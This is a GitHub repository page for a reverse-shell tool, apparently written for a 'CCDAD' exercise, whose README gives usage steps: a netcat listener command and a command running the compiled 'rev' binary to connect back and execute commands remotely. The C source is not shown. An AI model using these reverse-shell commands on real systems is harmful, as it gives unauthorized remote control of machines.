Skip to content

this is a CCDAD soltion , coded by me to make a reverse shell between the cuda server machine at the administration and the local clients hosts

Notifications You must be signed in to change notification settings

omarbenabdejlil/reverse-shell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

reverse-shell

This is our CCDAD soltion ,coded by me to make a reverse shell between the cuda server machine at the administration and the local clients hosts !

1 ) open a netcat server from you local client machine :

nc -ntlp 5566

2 ) make a connection from the server-host ,, when i compiled my "rev.c" file , i took in parameter 2 args ! [server addr & the port to bind the connection] :

./rev @your_machine_ip 5566

3 ) run any command from the client machine and the result will be executed from the server very quickly , enjoy the result !

image

About

this is a CCDAD soltion , coded by me to make a reverse shell between the cuda server machine at the administration and the local clients hosts

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages